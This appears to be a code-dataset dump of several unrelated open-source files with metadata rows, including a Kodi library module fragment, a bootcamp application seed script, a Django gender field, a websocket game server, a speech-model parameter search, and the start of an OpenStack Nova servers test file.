if item.multicanal:
# Obtener listado de canales
opciones = ["Eliminar solo los enlaces de %s" % k.capitalize() for k in item.library_urls.keys() if k !="descargas"]
opciones.insert(0, heading)
index = platformtools.dialog_select(config.get_localized_string(30163), opciones)
if index == 0:
# Seleccionado Eliminar pelicula/serie
eliminar_todo(item)
elif index > 0:
# Seleccionado Eliminar canal X
canal = opciones[index].replace("Eliminar solo los enlaces de ", "").lower()
num_enlaces= 0
for fd in filetools.listdir(item.path):
if fd.endswith(canal + '].json'):
if filetools.remove(filetools.join(item.path, fd)):
num_enlaces += 1
if num_enlaces > 0:
# Actualizar .nfo
head_nfo, item_nfo = library.read_nfo(item.nfo)
del item_nfo.library_urls[canal]
filetools.write(item.nfo, head_nfo + item_nfo.tojson())
msg_txt = "Eliminados %s enlaces del canal %s" % (num_enlaces, canal)
logger.info(msg_txt)
platformtools.dialog_notification(heading, msg_txt)
platformtools.itemlist_refresh()
else:
if platformtools.dialog_yesno(heading,
"¿Realmente desea eliminar '%s' de su biblioteca?" % item.infoLabels['title']):
eliminar_todo(item)
def check_season_playcount(item, season):
logger.info()
# logger.debug("item " + item.tostring("\n"))
episodios_temporada = 0
episodios_vistos_temporada = 0
for key, value in item.library_playcounts.iteritems():
if key.startswith("%sx" % season):
episodios_temporada += 1
if value > 0:
episodios_vistos_temporada += 1
if episodios_temporada == episodios_vistos_temporada:
# se comprueba que si todas las temporadas están vistas, se marque la serie como vista
item.library_playcounts.update({"season %s" % season: 1})
else:
# se comprueba que si todas las temporadas están vistas, se marque la serie como vista
item.library_playcounts.update({"season %s" % season: 0})
return check_tvshow_playcount(item, season)
def check_tvshow_playcount(item, season):
logger.info()
# logger.debug("item " + item.tostring("\n"))
temporadas_serie = 0
temporadas_vistas_serie = 0
for key, value in item.library_playcounts.iteritems():
if key == ("season %s" % season):
temporadas_serie += 1
if value > 0:
temporadas_vistas_serie += 1
if temporadas_serie == temporadas_vistas_serie:
item.library_playcounts.update({item.title: 1})
else:
item.library_playcounts.update({item.title: 0})
return item
| gpl-3.0 | -6,729,001,074,678,392,000 | 38.120991 | 124 | 0.566978 | false |
mitodl/bootcamp-ecommerce | localdev/seed/app_state_api.py | 1 | 17130 | """API functionality for setting the state of an application"""
import os
import random
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.core.files import File
from django.db.models import Max
from applications.models import (
VideoInterviewSubmission,
QuizSubmission,
ApplicationStepSubmission,
)
from applications.constants import (
AppStates,
REVIEW_STATUS_REJECTED,
REVIEW_STATUS_PENDING,
REVIEW_STATUS_APPROVED,
ORDERED_UNFINISHED_APP_STATES,
SUBMISSION_REVIEW_COMPLETED_STATES,
SUBMISSION_VIDEO,
SUBMISSION_QUIZ,
SUBMISSION_STATUS_SUBMITTED,
)
from jobma.models import Job, Interview
from jobma.constants import COMPLETED
from ecommerce.models import Order, Line
from ecommerce.api import complete_successful_order
from profiles.models import Profile, LegalAddress
from profiles.api import is_user_info_complete
from main.utils import now_in_utc, get_filename_from_path, partition_around_index
User = get_user_model()
ALLOWED_STATES = ORDERED_UNFINISHED_APP_STATES + [AppStates.COMPLETE.value]
DUMMY_RESUME_FILEPATH = "localdev/seed/resources/dummy_resume.pdf"
DUMMY_RESUME_FILENAME = get_filename_from_path(DUMMY_RESUME_FILEPATH)
DUMMY_RESUME_ENCODING = "iso-8859-1"
DUMMY_LINKEDIN_URL = "http://example.com/linkedin"
DUMMY_INTERVIEW_URL = ("http://example.com/video",)
DUMMY_INTERVIEW_RESULTS_URL = "http://example.com/video-result"
INTERVIEW_TEMPLATE_ID = 123
PROFILE_CHOICES = {
"company": ("MIT", "Boeing"),
"gender": ("m", "f", "o"),
"birth_year": (1950, 1960, 1970, 1980, 1990),
"job_title": ("Software Developer", "Administrator", "Professor", "Emperor"),
"industry": ("Tech", "Higher Ed"),
"job_function": ("Working hard", "Hardly working"),
"company_size": (9, 99),
"years_experience": (2, 5, 10),
"highest_education": ("Doctorate", "Bachelor's degree"),
"name": (
"Joseph M. Acaba",
"Kayla Barron",
"Raja Chari",
"Jeanatte J. Epps",
"Bob Hines",
"Jonny Kim",
"Nicole Aunapu Mann",
"Kathleen Rubins",
"Mark T. Vande Hei",
),
}
LEGAL_ADDRESS_CHOICES = {
"street_address_1": ("1 Main St", "500 Technology Square", "4 Washington Lane"),
"city": ("Cambridge", "Boston", "Somerville", "Townsville"),
"country": ("US",),
"state_or_territory": ("US-MA", "US-CT", "US-VT", "US-NH"),
"postal_code": ("02139", "02201", "02139"),
}
def fill_out_registration_info(user):
"""Ensures that the user has a fully filled out profile and legal address"""
profile, profile_created = Profile.objects.get_or_create(user=user)
if profile_created or not profile.is_complete:
profile.name = random.choice(PROFILE_CHOICES["name"])
profile_field_values = [
(field_name, values)
for field_name, values in PROFILE_CHOICES.items()
if field_name != "name"
]
for field_name, values in profile_field_values:
setattr(profile, field_name, random.choice(values))
profile.save()
if not profile.name:
profile.name = random.choice(PROFILE_CHOICES["name"])
profile.save()
if not hasattr(user, "legal_address"):
legal_address_props = {
prop_name: random.choice(prop_values)
for prop_name, prop_values in LEGAL_ADDRESS_CHOICES.items()
}
legal_address = LegalAddress.objects.create(
user=user,
first_name=profile.name.split(" ")[0],
last_name=" ".join(profile.name.split(" ")[1:]),
**legal_address_props,
)
else:
legal_address = user.legal_address
return user, profile, legal_address
def fulfill_video_interview(application, run_application_step):
"""
Ensures that a user has a completed video interview submission for the given application and step
Args:
application (applications.models.BootcampApplication):
run_application_step (applications.models.BootcampRunApplicationStep):
Returns:
ApplicationStepSubmission: The created or updated submission
"""
# If Job records already exist, use the max job_id value and add 1 for the new job_id. Otherwise use 1.
job_id = (
1
if Job.objects.count() == 0
else (Job.objects.aggregate(max_job_id=Max("job_id"))["max_job_id"] + 1)
)
job, _ = Job.objects.get_or_create(
run=application.bootcamp_run,
defaults=dict(
job_title=application.bootcamp_run.title,
job_id=job_id,
job_code=f"job_run_{application.bootcamp_run.id}",
interview_template_id=INTERVIEW_TEMPLATE_ID,
),
)
interview, _ = Interview.objects.get_or_create(
job=job,
applicant=application.user,
defaults=dict(
status=COMPLETED,
interview_url=DUMMY_INTERVIEW_URL,
results_url=DUMMY_INTERVIEW_RESULTS_URL,
interview_token="".join([str(random.randint(0, 9)) for _ in range(0, 9)]),
),
)
submission, _ = VideoInterviewSubmission.objects.get_or_create(interview=interview)
step_submission, _ = ApplicationStepSubmission.objects.update_or_create(
bootcamp_application=application,
run_application_step=run_application_step,
defaults=dict(
submitted_date=now_in_utc(),
review_status=REVIEW_STATUS_PENDING,
review_status_date=None,
submission_status=SUBMISSION_STATUS_SUBMITTED,
content_type=ContentType.objects.get(
app_label="applications", model=SUBMISSION_VIDEO
),
object_id=submission.id,
),
)
return step_submission
def fulfill_quiz_interview(application, run_application_step):
"""
Ensures that a user has a completed quiz interview submission for the given application and step
Args:
application (applications.models.BootcampApplication):
run_application_step (applications.models.BootcampRunApplicationStep):
Returns:
ApplicationStepSubmission: The created or updated submission
"""
submission = QuizSubmission.objects.create(started_date=None)
step_submission, _ = ApplicationStepSubmission.objects.update_or_create(
bootcamp_application=application,
run_application_step=run_application_step,
defaults=dict(
submitted_date=now_in_utc(),
review_status=REVIEW_STATUS_PENDING,
review_status_date=None,
submission_status=SUBMISSION_STATUS_SUBMITTED,
content_type=ContentType.objects.get(
app_label="applications", model=SUBMISSION_QUIZ
),
object_id=submission.id,
),
)
return step_submission
SUBMISSION_FACTORIES = {
SUBMISSION_VIDEO: fulfill_video_interview,
SUBMISSION_QUIZ: fulfill_quiz_interview,
}
class AppStep:
"""Base class for evaluating/setting an application at a certain state"""
state = None
@staticmethod
def is_fulfilled(application):
"""Returns True if the given application step has been fulfilled"""
raise NotImplementedError
@staticmethod
def _fulfill(application, **kwargs):
"""Performs the necessary data manipulation to fulfill this step of the application"""
raise NotImplementedError
@staticmethod
def _revert(application):
"""
Performs the necessary data manipulation to ensure that this step of the application has not been fulfilled
"""
raise NotImplementedError
@classmethod
def fulfill(cls, application, **kwargs):
"""
Performs the necessary data manipulation to fulfill this step of the application, and ensures that the
application is in the correct state afterwards
"""
cls._fulfill(application, **kwargs)
# NOTE: These functions perform some data manipulation on an application that aren't supported by normal
# functionality, hence the manual setting of the state instead of using state transitions.
application.refresh_from_db()
state_idx = ORDERED_UNFINISHED_APP_STATES.index(cls.state)
new_state = (
AppStates.COMPLETE.value
if state_idx == len(ORDERED_UNFINISHED_APP_STATES) - 1
else ORDERED_UNFINISHED_APP_STATES[state_idx + 1]
)
application.state = new_state
application.save()
@classmethod
def revert(cls, application):
"""
Performs the necessary data manipulation to ensure that this step of the application has not been fulfilled,
and ensures that the application is in the correct state afterwards
"""
cls._revert(application)
# NOTE: These functions perform some data manipulation on an application that aren't supported by normal
# functionality, hence the manual setting of the state instead of using state transitions.
application.refresh_from_db()
application.state = cls.state
application.save()
class AwaitingProfileStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting profile' step of an application"""
state = AppStates.AWAITING_PROFILE_COMPLETION.value
@staticmethod
def is_fulfilled(application):
return is_user_info_complete(application.user)
@staticmethod
def _fulfill(application, **kwargs):
fill_out_registration_info(application.user)
@staticmethod
def _revert(application):
LegalAddress.objects.filter(user=application.user).delete()
class AwaitingResumeStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting resume' step of an application"""
state = AppStates.AWAITING_RESUME.value
@staticmethod
def is_fulfilled(application):
return application.resume_upload_date is not None and (
application.resume_file is not None or application.linkedin_url is not None
)
@staticmethod
def _fulfill(application, **kwargs):
with open(
os.path.join(settings.BASE_DIR, DUMMY_RESUME_FILEPATH), "rb"
) as resume_file:
application.add_resume(
resume_file=File(resume_file, name=DUMMY_RESUME_FILENAME),
linkedin_url=DUMMY_LINKEDIN_URL,
)
application.save()
@staticmethod
def _revert(application):
if application.resume_file is not None:
application.resume_file.delete()
application.resume_file = None
application.linkedin_url = None
application.resume_upload_date = None
application.save()
class AwaitingSubmissionsStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting submissions' step of an application"""
state = AppStates.AWAITING_USER_SUBMISSIONS.value
@staticmethod
def is_fulfilled(application):
submissions = list(application.submissions.all())
submission_review_statuses = [
submission.review_status for submission in submissions
]
if any(
[status == REVIEW_STATUS_REJECTED for status in submission_review_statuses]
):
return True
elif any(
[status == REVIEW_STATUS_PENDING for status in submission_review_statuses]
):
return True
elif len(submissions) < application.bootcamp_run.application_steps.count():
return False
@staticmethod
def _fulfill(application, **kwargs):
num_to_fulfill = kwargs.get("num_submissions", None)
run_steps = application.bootcamp_run.application_steps.order_by(
"application_step__step_order"
).all()
num_to_fulfill = num_to_fulfill or len(run_steps)
if num_to_fulfill and num_to_fulfill > len(run_steps):
raise ValidationError(
"{} step(s) exist. Cannot fulfill {}.".format(
len(run_steps), num_to_fulfill
)
)
for i, run_step in enumerate(run_steps):
if i >= num_to_fulfill:
break
submission_factory = SUBMISSION_FACTORIES[
run_step.application_step.submission_type
]
submission_factory(application, run_step)
@staticmethod
def _revert(application):
application.submissions.all().delete()
class AwaitingReviewStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting submission review' step of an application"""
state = AppStates.AWAITING_SUBMISSION_REVIEW.value
@staticmethod
def is_fulfilled(application):
submissions = list(application.submissions.all())
submission_review_statuses = [
submission.review_status for submission in submissions
]
return len(submissions) > 0 and len(submissions) == len(
[
status
for status in submission_review_statuses
if status in SUBMISSION_REVIEW_COMPLETED_STATES
]
)
@staticmethod
def _fulfill(application, **kwargs):
num_to_fulfill = kwargs.get("num_reviews", None)
submissions = list(
application.submissions.order_by(
"run_application_step__application_step__step_order"
).all()
)
num_to_fulfill = num_to_fulfill or len(submissions)
if num_to_fulfill and num_to_fulfill > len(submissions):
raise ValidationError(
"{} submission(s) exist. Cannot fulfill {}.".format(
len(submissions), num_to_fulfill
)
)
now = now_in_utc()
for i, submission in enumerate(submissions):
if i >= num_to_fulfill:
break
submission.review_status = REVIEW_STATUS_APPROVED
submission.review_status_date = now
submission.save()
@staticmethod
def _revert(application):
application.submissions.update(
review_status=REVIEW_STATUS_PENDING, review_status_date=None
)
class AwaitingPaymentStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting payment' step of an application"""
state = AppStates.AWAITING_PAYMENT.value
@staticmethod
def is_fulfilled(application):
return application.is_paid_in_full
@staticmethod
def _fulfill(application, **kwargs):
run = application.bootcamp_run
total_run_price = run.price
order, _ = Order.objects.update_or_create(
user=application.user,
application=application,
defaults=dict(status=Order.FULFILLED, total_price_paid=total_run_price),
)
Line.objects.update_or_create(
order=order, bootcamp_run=run, defaults=dict(price=total_run_price)
)
complete_successful_order(order, send_receipt=False)
@staticmethod
def _revert(application):
Order.objects.filter(application=application).delete()
ORDERED_APPLICATION_STEP_CLASSES = [
AwaitingProfileStep,
AwaitingResumeStep,
AwaitingSubmissionsStep,
AwaitingReviewStep,
AwaitingPaymentStep,
]
def set_application_state(application, target_state):
"""
Manipulates the given application into the target state.
Args:
application (BootcampApplication):
target_state (str): The desired state of the application
Returns:
BootcampApplication: The updated application
"""
if settings.ENVIRONMENT in {"prod", "production"}:
raise ValidationError("This API function cannot be used in production")
assert target_state in ALLOWED_STATES
if target_state == AppStates.COMPLETE.value:
previous_step_classes, next_step_classes = (
ORDERED_APPLICATION_STEP_CLASSES,
[],
)
target_step_cls = None
else:
target_state_cls_index = next(
i
for i, step_cls in enumerate(ORDERED_APPLICATION_STEP_CLASSES)
if step_cls.state == target_state
)
previous_step_classes, next_step_classes = partition_around_index(
ORDERED_APPLICATION_STEP_CLASSES, target_state_cls_index
)
target_step_cls = ORDERED_APPLICATION_STEP_CLASSES[target_state_cls_index]
# Revert all steps that come after the target
for step_cls in reversed(next_step_classes):
step_cls.revert(application)
# Apply/fulfill all steps before the target (if not already fulfilled)
for step_cls in previous_step_classes:
if not step_cls.is_fulfilled(application):
step_cls.fulfill(application)
if target_step_cls:
# Make sure that the target state hasn't already been fulfilled
target_step_cls.revert(application)
return application
| bsd-3-clause | 5,803,917,556,540,261,000 | 34.83682 | 116 | 0.648803 | false |
TamiaLab/carnetdumaker | apps/gender/fields.py | 1 | 1538 | """
Model fields for the gender app.
"""
from django.db import models
from django.utils import six
from django.utils.translation import ugettext_lazy as _
from .constants import (GENDER_CHOICES,
GENDER_UNKNOWN)
class GenderFieldBase(models.CharField):
"""
This database model field can be used to store the gender of a person.
"""
description = _('A gender type object')
MAX_LENGTH = 1
def __init__(self, *args, **kwargs):
parent_kwargs = {
'max_length': self.MAX_LENGTH,
'choices': GENDER_CHOICES,
'default': GENDER_UNKNOWN,
'blank': True,
}
parent_kwargs.update(kwargs)
super(GenderFieldBase, self).__init__(*args, **parent_kwargs)
def deconstruct(self):
name, path, args, kwargs = super(GenderFieldBase, self).deconstruct()
if kwargs['choices'] == GENDER_CHOICES:
del kwargs['choices']
if kwargs['max_length'] == self.MAX_LENGTH:
del kwargs['max_length']
if kwargs['default'] == GENDER_UNKNOWN:
del kwargs['default']
if kwargs['blank']:
del kwargs['blank']
return name, path, args, kwargs
def get_internal_type(self):
return "CharField"
class GenderField(six.with_metaclass(models.SubfieldBase,
GenderFieldBase)):
"""
Database gender field. Can be used to store a gender type.
See ``GenderFieldBase`` for details.
"""
pass
| agpl-3.0 | 8,364,084,219,892,851,000 | 27.481481 | 77 | 0.587776 | false |
JaredButcher/dayOfSagittariusIII | Server/sockServer.py | 1 | 8357 | import asyncio
import dataManagement
from enum import Enum, unique
import html
import json
import threading
import websockets
dataStor = None
def start(port, data):
global dataStor
dataStor = data
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
coro = websockets.server.serve(handle_conn, host='', port=port, loop=loop)
server = loop.run_until_complete(coro)
except OSError:
print("close")
else:
loop.run_forever()
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
async def handle_conn(conn, Uri):
print("URI: " + Uri)
user = client(conn)
await user.beginReceiveLoop()
class client:
def __init__(self, conn):
self.conn = conn
self.alive = True
self.errorCount = 0
self.user = None
self.receiveDele = []
self.error = False
async def beginReceiveLoop(self):
while self.alive:
global dataStor;
try:
data = await self.conn.recv()
except websockets.exceptions.ConnectionClosed as e:
self.destory()
break
#Start processing and consturcting response
print("Message: " + data)
res = {}
message = None
try:
message = json.loads(data)
if field.action.value in message:
#INITAL CONNECTION---------------------------------------------------------
if self.user is None:
if message[field.action.value] == action.init.value:
if field.session.value in message:
user = dataStor.getUser(message[field.session.value])
if user != None:
user.setSock(self)
self.user = user
self.user.rmGame()
if not self.user.getName() is None:
res[field.action.value] = action.name.value;
res[field.name.value] = self.user.getName()
self.send(res)
if self.user is None:
self.sendError(error.badInit.value)
#SET NAME-------------------------------------------------------------------
elif message[field.action.value] == action.name.value:
if dataStor.setUserName(self.user, message[field.name.value]):
res[field.action.value] = action.name.value
res[field.name.value] = self.user.getName()
self.send(res)
else:
self.sendError(error.nameUsed.value)
#SERVER BROWSER-------------------------------------------------------------
elif message[field.action.value] == action.servers.value:
self.user.rmGame()
res[field.action.value] = action.servers.value
res[field.servers.value] = dataStor.getSagInfo()
self.send(res)
#MAKE GAME--------------------------------------------------------------------
elif message[field.action.value] == action.makeGame.value:
self.user.rmGame()
gameB = message[field.game.value]
sagGame = None
try:
sagGame = dataStor.makeSagGame(self.user, gameB[game.name.value][:30], int(gameB[game.maxPlayers.value]),
int(gameB[game.damage.value]), int(gameB[game.shipPoints.value]))
except ValueError:
sagGame = None
if sagGame is None:
self.sendError(error.createFail.value)
else:
sagGame.addUser(self.user)
res[field.action.value] = action.join.value
res[field.game.value] = sagGame.getInfo()
self.send(res)
#JOIN GAME---------------------------------------------------------------------
elif message[field.action.value] == action.join.value:
self.user.rmGame()
sagGame = dataStor.getSagGame(message[field.game.value][game.id.value])
if sagGame is None or not sagGame.addUser(self.user):
self.sendError(error.joinFail.value)
else:
res[field.action.value] = action.join.value
res[field.game.value] = sagGame.getInfo()
self.send(res)
#UPDATE--------------------------------------------------------------------------
elif message[field.action.value] == action.update.value and self.user.game:
self.user.game.recUpdate(self.user, message[field.game.value])
except json.JSONDecodeError as e:
print(e.msg)
self.sendError(error.badRequest)
if not self.error:
self.errorCount = 0
self.error = False
def sendError(self, errorCode):
res = {}
res[field.action.value] = action.error.value
res[field.error.value] = errorCode
self.send(res)
def send(self, data):
asyncio.get_event_loop().create_task(self._sendHelper(json.dumps(data)))
async def _sendHelper(self, data):
try:
print("Send: " + str(data))
await self.conn.send(data)
except websockets.exceptions.ConnectionClosed as e:
print(e)
self.destory()
def destory(self):
self.alive = False
if self.user:
self.user.rmGame()
self.user.setSock(None)
@unique
class field(Enum):
action = "0"
session = "1"
servers = "2" #[browser]
game = "3" #game
chatContext = "4"
chatMessage = "5"
name = "6"
error = "7"
@unique
class action(Enum):
error = "1"
update = "2"
init = "3"
servers = "4"
join = "5"
name = "6"
makeGame = "7"
chat = "8"
command = "9"
@unique
class error(Enum):
repeat = "0"
stop = "1"
badRequest = "2"
joinFail = "3"
createFail = "4"
badInit = "5"
forbidden = "6"
nameUsed = "7"
@unique
class game(Enum):
id = "0"
players = "1" #[player]
running = "2"
winner = "3"
name = "4"
owner = "5"
maxPlayers = "6"
damage = "7"
shipPoints = "8"
mode = "9"
teams = "10"
map = "11"
@unique
class player(Enum):
id = "0"
name = "1"
team = "2"
gameObj = "3" #[gameObj]
primary = "4" #weapon
primaryAmmo = "5"
secondary = "6" #weapon
secondaryAmmo = "7"
attack = "8"
defense = "9"
scout = "10"
speed = "11"
isFlagship = "12"
ships = "13"
delete = "14"
ready = "15"
@unique
class transform(Enum):
id = "0"
pos = "1" #{x,y}
rot = "2"
targetPos = "3" #{x,y}
targetRot = "4"
posV = "5" #{x,y}
rotV = "6"
hide = "7"
destory = "8"
@unique
class gameObj(Enum):
size = "0"
type = "1"
transform = "2" #transform
@unique
class weapon(Enum):
lazer = "0"
missle = "1"
rail = "2"
mine = "3"
fighter = "4"
plazma = "5"
emc = "6"
jump = "7"
repair = "8"
@unique
class chatContext(Enum):
free = "0"
game = "1"
team = "2"
@unique
class command(Enum):
source = "0" #transform
fire = "1" #ammo used if applicatble
target = "2" #transform
split = "3" #Size of new fleet
merge = "4" #[transform]
weapon = "5"
@unique
class gameMap(Enum):
height = "0"
width = "1"
@unique
class objType(Enum):
fleet = "1"
scout = "2"
scoutMove = "3"
missle = "4"
plasma = "5"
rail = "6" | mit | 310,050,558,187,058,500 | 31.905512 | 133 | 0.459495 | false |
SeanNaren/deepspeech.pytorch | search_lm_params.py | 1 | 3566 | from dataclasses import dataclass
import hydra
from hydra.core.config_store import ConfigStore
import optuna
import torch
from deepspeech_pytorch.configs.train_config import SpectConfig
from deepspeech_pytorch.decoder import BeamCTCDecoder, GreedyDecoder
from deepspeech_pytorch.loader.data_loader import AudioDataLoader, SpectrogramDataset
from deepspeech_pytorch.utils import load_model
from deepspeech_pytorch.validation import run_evaluation
@dataclass
class OptimizerConfig:
model_path: str = ''
test_path: str = '' # Path to test manifest or csv
is_character_based: bool = True # Use CER or WER for finding optimal parameters
lm_path: str = ''
beam_width: int = 10
alpha_from: float = 0.0
alpha_to: float = 3.0
beta_from: float = 0.0
beta_to: float = 1.0
n_trials: int = 500 # Number of trials for optuna
n_jobs: int = 2 # Number of parallel jobs for optuna
precision: int = 16
batch_size: int = 1 # For dataloader
num_workers: int = 1 # For dataloader
spect_cfg: SpectConfig = SpectConfig()
cs = ConfigStore.instance()
cs.store(name="config", node=OptimizerConfig)
class Objective(object):
def __init__(self, cfg):
self.cfg = cfg
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.model = load_model(
self.device,
hydra.utils.to_absolute_path(self.cfg.model_path)
)
self.ckpt = torch.load(
hydra.utils.to_absolute_path(self.cfg.model_path),
map_location=self.device
)
self.labels = self.ckpt['hyper_parameters']['labels']
self.decoder = BeamCTCDecoder(
labels=self.labels,
lm_path=hydra.utils.to_absolute_path(self.cfg.lm_path),
beam_width=self.cfg.beam_width,
num_processes=self.cfg.num_workers,
blank_index=self.labels.index('_')
)
self.target_decoder = GreedyDecoder(
labels=self.labels,
blank_index=self.labels.index('_')
)
test_dataset = SpectrogramDataset(
audio_conf=self.cfg.spect_cfg,
input_path=hydra.utils.to_absolute_path(cfg.test_path),
labels=self.labels,
normalize=True
)
self.test_loader = AudioDataLoader(
test_dataset,
batch_size=self.cfg.batch_size,
num_workers=self.cfg.num_workers
)
def __call__(self, trial):
alpha = trial.suggest_uniform('alpha', self.cfg.alpha_from, self.cfg.alpha_to)
beta = trial.suggest_uniform('beta', self.cfg.beta_from, self.cfg.beta_to)
self.decoder._decoder.reset_params(alpha, beta)
wer, cer = run_evaluation(
test_loader=self.test_loader,
device=self.device,
model=self.model,
decoder=self.decoder,
target_decoder=self.target_decoder,
precision=self.cfg.precision
)
return cer if self.cfg.is_character_based else wer
@hydra.main(config_name="config")
def main(cfg: OptimizerConfig) -> None:
study = optuna.create_study()
study.optimize(Objective(cfg),
n_trials=cfg.n_trials,
n_jobs=cfg.n_jobs,
show_progress_bar=True)
print(f"Best Params\n"
f"alpha: {study.best_params['alpha']}\n"
f"beta: {study.best_params['beta']}\n"
f"{'cer' if cfg.is_character_based else 'wer'}: {study.best_value}")
if __name__ == "__main__":
main()
| mit | 8,604,702,044,512,136,000 | 32.327103 | 86 | 0.618059 | false |
jumpstarter-io/nova | nova/tests/api/openstack/compute/plugins/v3/test_servers.py | 1 | 134728 | # Copyright 2010-2011 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import contextlib
import copy
import datetime
import uuid
import iso8601
import mock
import mox
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
import testtools
import webob
from nova.api.openstack import compute
from nova.api.openstack.compute import plugins
from nova.api.openstack.compute.plugins.v3 import access_ips
from nova.api.openstack.compute.plugins.v3 import ips
from nova.api.openstack.compute.plugins.v3 import keypairs
from nova.api.openstack.compute.plugins.v3 import servers
from nova.api.openstack.compute.schemas.v3 import keypairs as keypairs_schema
from nova.api.openstack.compute.schemas.v3 import servers as servers_schema
from nova.api.openstack.compute import views
from nova.api.openstack import extensions
from nova.compute import api as compute_api
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova.db.sqlalchemy import models
from nova import exception
from nova.i18n import _
from nova.image import glance
from nova.network import manager
from nova.network.neutronv2 import api as neutron_api
from nova import objects
from nova.objects import instance as instance_obj
from nova.openstack.common import jsonutils
from nova.openstack.common import policy as common_policy
from nova.openstack.common import timeutils
from nova import policy
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_instance
from nova.tests import fake_network
from nova.tests.image import fake
from nova.tests import matchers
from nova import utils as nova_utils
CONF = cfg.CONF
CONF.import_opt('password_length', 'nova.utils')
FAKE_UUID = fakes.FAKE_UUID
INSTANCE_IDS = {FAKE_UUID: 1}
FIELDS = instance_obj.INSTANCE_DEFAULT_FIELDS
def fake_gen_uuid():
return FAKE_UUID
def return_servers_empty(context, *args, **kwargs):
return []
def instance_update_and_get_original(context, instance_uuid, values,
update_cells=True,
columns_to_join=None,
):
inst = fakes.stub_instance(INSTANCE_IDS.get(instance_uuid),
name=values.get('display_name'))
inst = dict(inst, **values)
return (inst, inst)
def instance_update(context, instance_uuid, values, update_cells=True):
inst = fakes.stub_instance(INSTANCE_IDS.get(instance_uuid),
name=values.get('display_name'))
inst = dict(inst, **values)
return inst
def fake_compute_api(cls, req, id):
return True
def fake_start_stop_not_ready(self, context, instance):
raise exception.InstanceNotReady(instance_id=instance["uuid"])
def fake_start_stop_invalid_state(self, context, instance):
raise exception.InstanceInvalidState(
instance_uuid=instance['uuid'], attr='fake_attr',
method='fake_method', state='fake_state')
def fake_instance_get_by_uuid_not_found(context, uuid,
columns_to_join, use_slave=False):
raise exception.InstanceNotFound(instance_id=uuid)
class MockSetAdminPassword(object):
def __init__(self):
self.instance_id = None
self.password = None
def __call__(self, context, instance_id, password):
self.instance_id = instance_id
self.password = password
class Base64ValidationTest(test.TestCase):
def setUp(self):
super(Base64ValidationTest, self).setUp()
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
def test_decode_base64(self):
value = "A random string"
result = self.controller._decode_base64(base64.b64encode(value))
self.assertEqual(result, value)
def test_decode_base64_binary(self):
value = "\x00\x12\x75\x99"
result = self.controller._decode_base64(base64.b64encode(value))
self.assertEqual(result, value)
def test_decode_base64_whitespace(self):
value = "A random string"
encoded = base64.b64encode(value)
white = "\n \n%s\t%s\n" % (encoded[:2], encoded[2:])
result = self.controller._decode_base64(white)
self.assertEqual(result, value)
def test_decode_base64_invalid(self):
invalid = "A random string"
result = self.controller._decode_base64(invalid)
self.assertIsNone(result)
def test_decode_base64_illegal_bytes(self):
value = "A random string"
encoded = base64.b64encode(value)
white = ">\x01%s*%s()" % (encoded[:2], encoded[2:])
result = self.controller._decode_base64(white)
self.assertIsNone(result)
class NeutronV2Subclass(neutron_api.API):
"""Used to ensure that API handles subclasses properly."""
pass
class ControllerTest(test.TestCase):
def setUp(self):
super(ControllerTest, self).setUp()
self.flags(verbose=True, use_ipv6=False)
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
return_server = fakes.fake_instance_get()
return_servers = fakes.fake_instance_get_all_by_filters()
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers)
self.stubs.Set(db, 'instance_get_by_uuid',
return_server)
self.stubs.Set(db, 'instance_update_and_get_original',
instance_update_and_get_original)
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
self.ips_controller = ips.IPsController()
policy.reset()
policy.init()
fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
class ServersControllerTest(ControllerTest):
def setUp(self):
super(ServersControllerTest, self).setUp()
CONF.set_override('host', 'localhost', group='glance')
def test_requested_networks_prefix(self):
uuid = 'br-00000000-0000-0000-0000-000000000000'
requested_networks = [{'uuid': uuid}]
res = self.controller._get_requested_networks(requested_networks)
self.assertIn((uuid, None), res.as_tuples())
def test_requested_networks_neutronv2_enabled_with_port(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
def test_requested_networks_neutronv2_enabled_with_network(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
requested_networks = [{'uuid': network}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(network, None, None)], res.as_tuples())
def test_requested_networks_neutronv2_enabled_with_network_and_port(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
def test_requested_networks_neutronv2_enabled_conflict_on_fixed_ip(self):
